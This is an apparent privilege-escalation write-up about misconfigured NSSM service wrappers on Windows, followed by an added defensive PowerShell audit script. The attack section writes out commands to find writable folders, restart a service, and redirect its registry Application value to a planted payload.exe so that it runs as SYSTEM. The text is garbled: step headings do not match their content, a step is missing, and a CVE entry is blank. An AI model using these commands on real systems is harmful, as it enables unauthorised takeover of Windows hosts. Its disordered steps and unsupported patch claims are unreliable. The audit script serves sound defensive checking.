NSSM 2.24 Privilege Escalation (Updated Jun 2026)
This technique was partially patched in Windows 11 23H2, but many enterprise LTSB/LTSC builds remain vulnerable.

| CVE ID | Affected Software/Vendor | Impact | Remediation Status |
| :--- | :--- | :--- | :--- |
| | Phoenix Contact DaUM (<2025.3.1) | Low-privileged user -> Admin rights | Update to 2025.3.1 or later |
| CVE-2024-51448 | IBM Robotic Process Automation (21.0.0-23.0.18) | Non-privileged user -> Admin via substitution | Vendor patch required |
| CVE-2016-20033 | Wowza Streaming Engine 4.5.0 | Everyone group -> LocalSystem via hijacking | Restrict permissions |

The discovery of and the update to CVE-2024-51448 serve as a critical reminder that convenience tools like NSSM 2.24 become security liabilities when file permissions are misconfigured. While NSSM itself is not inherently malicious, its integration into enterprise installers often inherits the "lazy" security posture of the parent application.
If a service path points to nssm.exe, the attacker investigates further using icacls to check the folder permissions of the application binary listed in the service configuration:

```cmd
icacls "C:\Program Files\TargetApp"
```

Alternatively, you can manually inspect common deployment paths like C:\Program Files\, C:\nssm\, or custom application directories.

Step 2: Checking for Weak Registry Permissions
To trigger the execution, the service must be restarted. If the low-privilege user has permissions to restart the service, they can execute:

```cmd
net stop ExampleService && net start ExampleService
```

```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService\Parameters /v Application /t REG_SZ /d "C:\Users\Public\payload.exe" /f
```

Step 4: Triggering Execution
Continued updates to older vulnerabilities in Wowza Streaming Engine showed that the "Everyone" group was still being granted full access to nssm_x64.exe in certain configurations.
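
A defensive audit of the conditions this page describes, as an added example that is not part of the original article: it enumerates services whose ImagePath launches an nssm*.exe wrapper and reports file or registry ACEs that give write-type access to Everyone, Authenticated Users, BUILTIN\Users or INTERACTIVE. The function name Get-WeakAce, the SID list and the rights masks are choices made for this example.

```powershell
# Added audit example (not from the original page): list NSSM-wrapped services
# whose files or Parameters key grant write access to low-privileged groups.
# Well-known SIDs: Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE.
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'
# Rights that allow replacing a binary or redirecting the service, plus
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) as raw bits.
$FileWrite = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership' -bor 0x50000000
$RegWrite  = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership' -bor 0x50000000

function Get-WeakAce {
    param([string]$Path, [string]$RightsProperty, [int]$Mask)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    # Ask for SIDs instead of names so the check is locale-independent.
    $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivSids -contains $_.IdentityReference.Value -and
            ([int]$_.$RightsProperty -band $Mask)
        } |
        ForEach-Object {
            [pscustomobject]@{ Path = $Path; Sid = $_.IdentityReference.Value; Rights = $_.$RightsProperty }
        }
}

Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
    $name = $_.PSChildName
    $svc  = Get-ItemProperty -LiteralPath $_.PSPath -ErrorAction SilentlyContinue
    # Keep only services whose ImagePath launches an nssm*.exe wrapper.
    if ($svc.ImagePath -notmatch '^\s*"?(.+?nssm[^\\"]*\.exe)') { return }
    $wrapper  = [Environment]::ExpandEnvironmentVariables($Matches[1])
    $paramKey = "$($_.PSPath)\Parameters"
    # NSSM stores the real program to launch in Parameters\Application.
    $app = (Get-ItemProperty -LiteralPath $paramKey -ErrorAction SilentlyContinue).Application

    $paths = @($wrapper, (Split-Path $wrapper -Parent))
    if ($app) { $paths += $app, (Split-Path $app -Parent) }

    $findings  = @($paths | Where-Object { $_ } | Select-Object -Unique |
                   ForEach-Object { Get-WeakAce $_ 'FileSystemRights' $FileWrite })
    $findings += @(Get-WeakAce $paramKey 'RegistryRights' $RegWrite)
    $findings | Select-Object @{ n = 'Service'; e = { $name } }, Path, Sid, Rights
} | Format-Table -AutoSize -Wrap
```

Run it from an elevated PowerShell session so every service key and folder ACL can be read; an empty result means none of the listed groups holds write-type rights on the checked paths.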